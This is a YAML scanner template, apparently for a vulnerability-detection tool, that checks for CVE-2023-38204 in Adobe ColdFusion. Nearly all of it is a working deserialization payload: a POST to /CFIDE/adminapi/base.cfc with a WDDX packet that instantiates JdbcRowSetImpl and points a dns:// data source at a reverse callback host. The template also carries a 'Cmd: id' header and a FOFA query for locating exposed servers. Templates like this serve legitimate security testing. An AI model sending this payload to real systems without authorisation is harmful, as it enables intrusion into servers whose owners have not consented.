id: CVE-2023-38204

info:
  name: Adobe ColdFusion 序列化漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |-
    FOFA: app="Adobe-ColdFusion"
  reference:
    - https://mp.weixin.qq.com/s/vLvh7TEsyXWPona2gw3Szg
  tags: cve,cve2023,coldfusion,unserialize

set:
  reverse: newReverse()
  reverseHost: reverse.url.host
rules:
  r0:
    request:
      method: POST
      path: /CFIDE/adminapi/base.cfc?method
      headers:
        Cmd: id
      body: |
        argumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>dns%3a//{{reverseHost}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>
    expression: reverse.wait(5)
expression: r0()